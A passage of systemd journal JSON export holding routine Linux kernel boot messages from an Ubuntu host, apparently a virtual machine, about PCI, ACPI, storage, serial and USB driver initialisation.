"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=142;b=e2b08827b5804427b422c10c84f1567e;m=56a65c;t=5bd16dd1a25c3;x=595f41ddd1f2a821", "__REALTIME_TIMESTAMP" : "1615280779961795", "__MONOTONIC_TIMESTAMP" : "5678684", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : "0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "448568", "MESSAGE" : "pci 0000:00:01.0: PIIX3: Enabling Passive Release" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=143;b=e2b08827b5804427b422c10c84f1567e;m=56a704;t=5bd16dd1a266c;x=75d157c138f23e2c", "__REALTIME_TIMESTAMP" : "1615280779961964", "__MONOTONIC_TIMESTAMP" : "5678852", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : "0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "451465", "MESSAGE" : "pci 0000:00:01.0: Activating ISA DMA hang workarounds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=144;b=e2b08827b5804427b422c10c84f1567e;m=56a712;t=5bd16dd1a2679;x=3a7b2a2a2ef66c73", "__REALTIME_TIMESTAMP" : "1615280779961977", "__MONOTONIC_TIMESTAMP" : "5678866", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "479755", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 11" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=145;b=e2b08827b5804427b422c10c84f1567e;m=56a78b;t=5bd16dd1a26f3;x=31bf186027993c3d", "__REALTIME_TIMESTAMP" : "1615280779962099", "__MONOTONIC_TIMESTAMP" : "5678987", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "507251", "MESSAGE" : "pci 0000:00:02.0: Video device with shadowed ROM at [mem 0x000c0000-0x000dffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=146;b=e2b08827b5804427b422c10c84f1567e;m=56a799;t=5bd16dd1a2700;x=21fcaca2e8065e0f", "__REALTIME_TIMESTAMP" : "1615280779962112", "__MONOTONIC_TIMESTAMP" : "5679001", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "511431", "MESSAGE" : "PCI: CLS 0 bytes, default 64" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=147;b=e2b08827b5804427b422c10c84f1567e;m=56a7a4;t=5bd16dd1a270b;x=e18d87de9a174e67", "__REALTIME_TIMESTAMP" : "1615280779962123", "__MONOTONIC_TIMESTAMP" : "5679012", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "511497", "MESSAGE" : "Unpacking initramfs..." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=148;b=e2b08827b5804427b422c10c84f1567e;m=56a7ae;t=5bd16dd1a2715;x=34e7746456cde406", "__REALTIME_TIMESTAMP" : "1615280779962133", "__MONOTONIC_TIMESTAMP" : "5679022", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "820583", "MESSAGE" : "Freeing initrd memory: 19144K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=149;b=e2b08827b5804427b422c10c84f1567e;m=56a7d8;t=5bd16dd1a2740;x=5311d723c461c786", "__REALTIME_TIMESTAMP" : "1615280779962176", "__MONOTONIC_TIMESTAMP" : "5679064", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "822860", "MESSAGE" : "clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1e45270b174, max_idle_ns: 440795290368 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14a;b=e2b08827b5804427b422c10c84f1567e;m=56a7e4;t=5bd16dd1a274c;x=7be0fc3755f665ff", "__REALTIME_TIMESTAMP" : "1615280779962188", "__MONOTONIC_TIMESTAMP" : "5679076", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "827749", "MESSAGE" : "Scanning for low memory corruption every 60 seconds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14b;b=e2b08827b5804427b422c10c84f1567e;m=56a7ef;t=5bd16dd1a2757;x=3cb141ae816e568", "__REALTIME_TIMESTAMP" : "1615280779962199", "__MONOTONIC_TIMESTAMP" : "5679087", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "831232", "MESSAGE" : "Initialise system trusted keyrings" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14c;b=e2b08827b5804427b422c10c84f1567e;m=56a7ff;t=5bd16dd1a2766;x=95dc4b6c01d1635b", "__REALTIME_TIMESTAMP" : "1615280779962214", "__MONOTONIC_TIMESTAMP" : "5679103", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "833536", "MESSAGE" : "Key type blacklist registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14d;b=e2b08827b5804427b422c10c84f1567e;m=56a80a;t=5bd16dd1a2772;x=f83460486555e757", "__REALTIME_TIMESTAMP" : "1615280779962226", "__MONOTONIC_TIMESTAMP" : "5679114", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "835536", "MESSAGE" : "workingset: timestamp_bits=36 max_order=19 bucket_order=0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14e;b=e2b08827b5804427b422c10c84f1567e;m=56a816;t=5bd16dd1a277d;x=c5140dbfdb532134", "__REALTIME_TIMESTAMP" : "1615280779962237", "__MONOTONIC_TIMESTAMP" : "5679126", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "839847", "MESSAGE" : "zbud: loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14f;b=e2b08827b5804427b422c10c84f1567e;m=56a821;t=5bd16dd1a2788;x=6aa5a866a54b4f6f", "__REALTIME_TIMESTAMP" : "1615280779962248", "__MONOTONIC_TIMESTAMP" : "5679137", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "841736", "MESSAGE" : "squashfs: version 4.0 (2009/01/31) Phillip Lougher" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=150;b=e2b08827b5804427b422c10c84f1567e;m=56a82b;t=5bd16dd1a2793;x=3c2d75adcdd0eb95", "__REALTIME_TIMESTAMP" : "1615280779962259", "__MONOTONIC_TIMESTAMP" : "5679147", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "844673", "MESSAGE" : "fuse init (API version 7.26)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=151;b=e2b08827b5804427b422c10c84f1567e;m=56a836;t=5bd16dd1a279e;x=28d57277178b50dc", "__REALTIME_TIMESTAMP" : "1615280779962270", "__MONOTONIC_TIMESTAMP" : "5679158", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "847472", "MESSAGE" : "Key type asymmetric registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=152;b=e2b08827b5804427b422c10c84f1567e;m=56a850;t=5bd16dd1a27b8;x=40d8d771ff08ccfa", "__REALTIME_TIMESTAMP" : "1615280779962296", "__MONOTONIC_TIMESTAMP" : "5679184", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "849648", "MESSAGE" : "Asymmetric key parser 'x509' registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=153;b=e2b08827b5804427b422c10c84f1567e;m=56a85b;t=5bd16dd1a27c3;x=317efab2144cd854", "__REALTIME_TIMESTAMP" : "1615280779962307", "__MONOTONIC_TIMESTAMP" : "5679195", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "852179", "MESSAGE" : "Block layer SCSI generic (bsg) driver version 0.4 loaded (major 246)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=154;b=e2b08827b5804427b422c10c84f1567e;m=56a866;t=5bd16dd1a27cd;x=fdb3901705b7c0c9", "__REALTIME_TIMESTAMP" : "1615280779962317", "__MONOTONIC_TIMESTAMP" : "5679206", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "856083", "MESSAGE" : "io scheduler noop registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=155;b=e2b08827b5804427b422c10c84f1567e;m=56a870;t=5bd16dd1a27d8;x=3ae086dee1bc9bf0", "__REALTIME_TIMESTAMP" : "1615280779962328", "__MONOTONIC_TIMESTAMP" : "5679216", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "858210", "MESSAGE" : "io scheduler deadline registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=156;b=e2b08827b5804427b422c10c84f1567e;m=56a87e;t=5bd16dd1a27e6;x=a7bf049c758daa9c", "__REALTIME_TIMESTAMP" : "1615280779962342", "__MONOTONIC_TIMESTAMP" : "5679230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "860598", "MESSAGE" : "io scheduler cfq registered (default)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=157;b=e2b08827b5804427b422c10c84f1567e;m=56a889;t=5bd16dd1a27f0;x=62b6dd90bf32f5c", "__REALTIME_TIMESTAMP" : "1615280779962352", "__MONOTONIC_TIMESTAMP" : "5679241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "863243", "MESSAGE" : "intel_idle: Please enable MWAIT in BIOS SETUP" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=158;b=e2b08827b5804427b422c10c84f1567e;m=56a894;t=5bd16dd1a27fb;x=9579224210b193a0", "__REALTIME_TIMESTAMP" : "1615280779962363", "__MONOTONIC_TIMESTAMP" : "5679252", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "863357", "MESSAGE" : "input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=159;b=e2b08827b5804427b422c10c84f1567e;m=56a89e;t=5bd16dd1a2806;x=faabb4a05e54fe68", "__REALTIME_TIMESTAMP" : "1615280779962374", "__MONOTONIC_TIMESTAMP" : "5679262", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "867345", "MESSAGE" : "ACPI: Power Button [PWRF]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15a;b=e2b08827b5804427b422c10c84f1567e;m=56a8a9;t=5bd16dd1a2810;x=b5d2cab658903538", "__REALTIME_TIMESTAMP" : "1615280779962384", "__MONOTONIC_TIMESTAMP" : "5679273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "895765", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15b;b=e2b08827b5804427b422c10c84f1567e;m=56a8b3;t=5bd16dd1a281b;x=975e38e9f7891a99", "__REALTIME_TIMESTAMP" : "1615280779962395", "__MONOTONIC_TIMESTAMP" : "5679283", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "953887", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15c;b=e2b08827b5804427b422c10c84f1567e;m=56a8be;t=5bd16dd1a2825;x=76d0dfb4403d0404", "__REALTIME_TIMESTAMP" : "1615280779962405", "__MONOTONIC_TIMESTAMP" : "5679294", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "959258", "MESSAGE" : "Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15d;b=e2b08827b5804427b422c10c84f1567e;m=56a8c8;t=5bd16dd1a2830;x=e3dc566651669442", "__REALTIME_TIMESTAMP" : "1615280779962416", "__MONOTONIC_TIMESTAMP" : "5679304", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "990516", "MESSAGE" : "00:04: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15e;b=e2b08827b5804427b422c10c84f1567e;m=56a8d3;t=5bd16dd1a283a;x=bafe6839371d59b1", "__REALTIME_TIMESTAMP" : "1615280779962426", "__MONOTONIC_TIMESTAMP" : "5679315", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "995867", "MESSAGE" : "Linux agpgart interface v0.103" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15f;b=e2b08827b5804427b422c10c84f1567e;m=56a8e1;t=5bd16dd1a2848;x=e1e7dbc7437c01cd", "__REALTIME_TIMESTAMP" : "1615280779962440", "__MONOTONIC_TIMESTAMP" : "5679329", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "999305", "MESSAGE" : "loop: module loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=160;b=e2b08827b5804427b422c10c84f1567e;m=56a981;t=5bd16dd1a28e8;x=5ea5d18ed95c93f8", "__REALTIME_TIMESTAMP" : "1615280779962600", "__MONOTONIC_TIMESTAMP" : "5679489", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1001245", "MESSAGE" : "ata_piix 0000:00:01.1: version 2.13" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=161;b=e2b08827b5804427b422c10c84f1567e;m=56aa3a;t=5bd16dd1a29a2;x=75e5a5ceaf738cb5", "__REALTIME_TIMESTAMP" : "1615280779962786", "__MONOTONIC_TIMESTAMP" : "5679674", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "scsi", "_KERNEL_DEVICE" : "+scsi:host0", "_UDEV_SYSNAME" : "host0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1002292", "MESSAGE" : "scsi host0: ata_piix" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=162;b=e2b08827b5804427b422c10c84f1567e;m=56aaca;t=5bd16dd1a2a31;x=8576405b03731e66", "__REALTIME_TIMESTAMP" : "1615280779962929", "__MONOTONIC_TIMESTAMP" : "5679818", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "scsi", "_KERNEL_DEVICE" : "+scsi:host1", "_UDEV_SYSNAME" : "host1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1004238", "MESSAGE" : "scsi host1: ata_piix" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=163;b=e2b08827b5804427b422c10c84f1567e;m=56aad9;t=5bd16dd1a2a41;x=138bf646975bf51", "__REALTIME_TIMESTAMP" : "1615280779962945", "__MONOTONIC_TIMESTAMP" : "5679833", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1006029", "MESSAGE" : "ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc0c0 irq 14" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=164;b=e2b08827b5804427b422c10c84f1567e;m=56aae4;t=5bd16dd1a2a4b;x=2194139371723e17", "__REALTIME_TIMESTAMP" : "1615280779962955", "__MONOTONIC_TIMESTAMP" : "5679844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1009318", "MESSAGE" : "ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc0c8 irq 15" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=165;b=e2b08827b5804427b422c10c84f1567e;m=56aafe;t=5bd16dd1a2a65;x=4dc37be8fab0aeaf", "__REALTIME_TIMESTAMP" : "1615280779962981", "__MONOTONIC_TIMESTAMP" : "5679870", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1013436", "MESSAGE" : "libphy: Fixed MDIO Bus: probed" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=166;b=e2b08827b5804427b422c10c84f1567e;m=56ab19;t=5bd16dd1a2a80;x=2cf67f06d0b6d664", "__REALTIME_TIMESTAMP" : "1615280779963008", "__MONOTONIC_TIMESTAMP" : "5679897", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1015489", "MESSAGE" : "tun: Universal TUN/TAP device driver, 1.6" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=167;b=e2b08827b5804427b422c10c84f1567e;m=56ab23;t=5bd16dd1a2a8b;x=378816d957ac1cbf", "__REALTIME_TIMESTAMP" : "1615280779963019", "__MONOTONIC_TIMESTAMP" : "5679907", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1018110", "MESSAGE" : "PPP generic driver version 2.4.2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=168;b=e2b08827b5804427b422c10c84f1567e;m=56ab2e;t=5bd16dd1a2a95;x=18e4f82f2fb204f5", "__REALTIME_TIMESTAMP" : "1615280779963029", "__MONOTONIC_TIMESTAMP" : "5679918", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1020262", "MESSAGE" : "ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=169;b=e2b08827b5804427b422c10c84f1567e;m=56ab38;t=5bd16dd1a2aa0;x=3e3190bec7f42fb6", "__REALTIME_TIMESTAMP" : "1615280779963040", "__MONOTONIC_TIMESTAMP" : "5679928", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", 